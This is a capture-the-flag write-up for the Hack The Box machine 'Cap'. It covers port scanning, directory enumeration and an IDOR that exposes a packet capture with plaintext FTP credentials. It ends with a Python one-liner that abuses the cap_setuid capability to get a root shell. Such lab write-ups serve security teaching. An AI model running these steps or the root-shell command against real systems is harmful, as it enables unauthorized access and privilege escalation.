Cap – HTB Writeup

Reconnaissance

Port Scanning

First we scan with nmap to see how much ports are open:

nmap -p- -sS --min-rate 5000 -n -Pn -vvv 10.129.13.81 -oG allPorts

nmap -p- -sS --min-rate 5000 -n -Pn -vvv 10.129.13.81 -oG allPorts

• -p-: Scan all 65535 ports
• -sS: Perform a SYN stealth scan
• --min-rate 5000: Send packets at a minimum rate of 5000 per second
• -n: Disable DNS resolution
• -Pn: Skip host discovery (treat host as online)
• -vvv: Very verbose output level
• -oG allPorts: Save results in greppable format to file “allPorts”

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

And then we search for the version of the service of each open port and throw some basic nmap scrits:

nmap -p21,22,80 -sCV -Pn 10.129.13.81 -oN target

nmap -p21,22,80 -sCV -Pn 10.129.13.81 -oN target

• -p21,22,80: Scan only ports 21, 22, and 80
• -sC: Run default NSE scripts for service detection
• -sV: Detect service versions on open ports
• -Pn: Skip host discovery (treat host as online)
• -oN target: Save results in normal format to file “target”

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We only obtain the info that there is a TCP, SSH and HTTP services running.

Lets start with the web.

Web scan

We have gobuster running to search for files and directories:

gobuster dir -url <http://10.129.13.81/> -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,bak,old,txt,json,xml,config -t 200 2>/dev/null

gobuster dir -url <http://10.129.13.81/> -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,bak,old,txt,json,xml,config -t 200 2>/dev/null

• dir: Directory/file enumeration mode
• -url <http://10.129.13.81/:> Target URL to scan
• -w: Wordlist file path for brute-forcing directories and files
• -x php,bak,old,txt,json,xml,config: File extensions to append during enumeration
• -t 200: Number of concurrent threads to use
• 2>/dev/null: Redirect error output to null (suppress errors)

That will result on this:

data                 (Status: 302) [Size: 208] [--> <http://10.129.13.81/>]
ip                   (Status: 200) [Size: 17452]
netstat              (Status: 200) [Size: 58355]
capture              (Status: 302) [Size: 220] [--> <http://10.129.13.81/data/2>]

data                 (Status: 302) [Size: 208] [--> <http://10.129.13.81/>]
ip                   (Status: 200) [Size: 17452]
netstat              (Status: 200) [Size: 58355]
capture              (Status: 302) [Size: 220] [--> <http://10.129.13.81/data/2>]

ip and netstat are rabbitholes that seem to be potential command injection, but not.

The capture endpoint seem to make a snapshot of the net and display it at the /data endpoint below a number that increases each time we make a snapshots.

We see that we can change the number an access other captures. All captures are with 0 data on the packets. But if we put the 0 number, we access to a capture with some data.

We can download it and see its info with tshark

Pcap analysis

We see the content of the capture

tshark -r 0.pcap

tshark -r 0.pcap

• -r: Read packet data from a specified capture file
• 0.pcap: Name of the packet capture file to read and analyze

And we see some credentials in plaintext

   36   4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
   37   4.126526 192.168.196.16 → 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=21 Ack=14 Win=64256 Len=0
   38   4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
   39   4.167701 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=14 Ack=55 Win=1051136 Len=0
   40   5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS B*********

   36   4.126500 192.168.196.1 → 192.168.196.16 FTP 69 Request: USER nathan
   37   4.126526 192.168.196.16 → 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=21 Ack=14 Win=64256 Len=0
   38   4.126630 192.168.196.16 → 192.168.196.1 FTP 90 Response: 331 Please specify the password.
   39   4.167701 192.168.196.1 → 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=14 Ack=55 Win=1051136 Len=0
   40   5.424998 192.168.196.1 → 192.168.196.16 FTP 78 Request: PASS B*********

We enter by SSH to the machine with those credentials and we have the user flag.

Privilege Escalation

We search for capabilities and we find something really interesting:

getcap -r / 2>/dev/null

getcap -r / 2>/dev/null

• -r: Recursively search through directories
• /: Starting directory path (root in this case)
• 2>/dev/null: Redirect error output to null (suppress errors)

We found setuid capabilities for python3.8

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

Abusing Capabilities

If we access to GTFObins, we have a simple command to get a shell abusing from that capability.

python3.8 -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'

python3.8 -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'

• -c: Execute the command string that follows
• import os: Import the os module to access operating system functionality
• os.setuid(0): Set the user ID to 0 (root)
• os.execl("/bin/sh", "sh"): Replace the current process with a new shell process

By doing this, we first set our user ID to act as root and then execute a shell (which is executing as the user ID 0 which is root).

Conclusion

This machine demonstrated a straightforward attack path combining IDOR vulnerability exploitation and Linux capabilities abuse. By accessing an unprotected packet capture through predictable numbering, we obtained FTP credentials in plaintext that granted SSH access. Privilege escalation was achieved by leveraging the cap_setuid capability on Python 3.8, allowing us to spawn a root shell. The machine emphasizes the importance of proper access controls on sensitive data, secure credential transmission, and careful capability assignment to system binaries.

Video Walkthrough

Here you have a video on spanish about the walkthrough of this machine: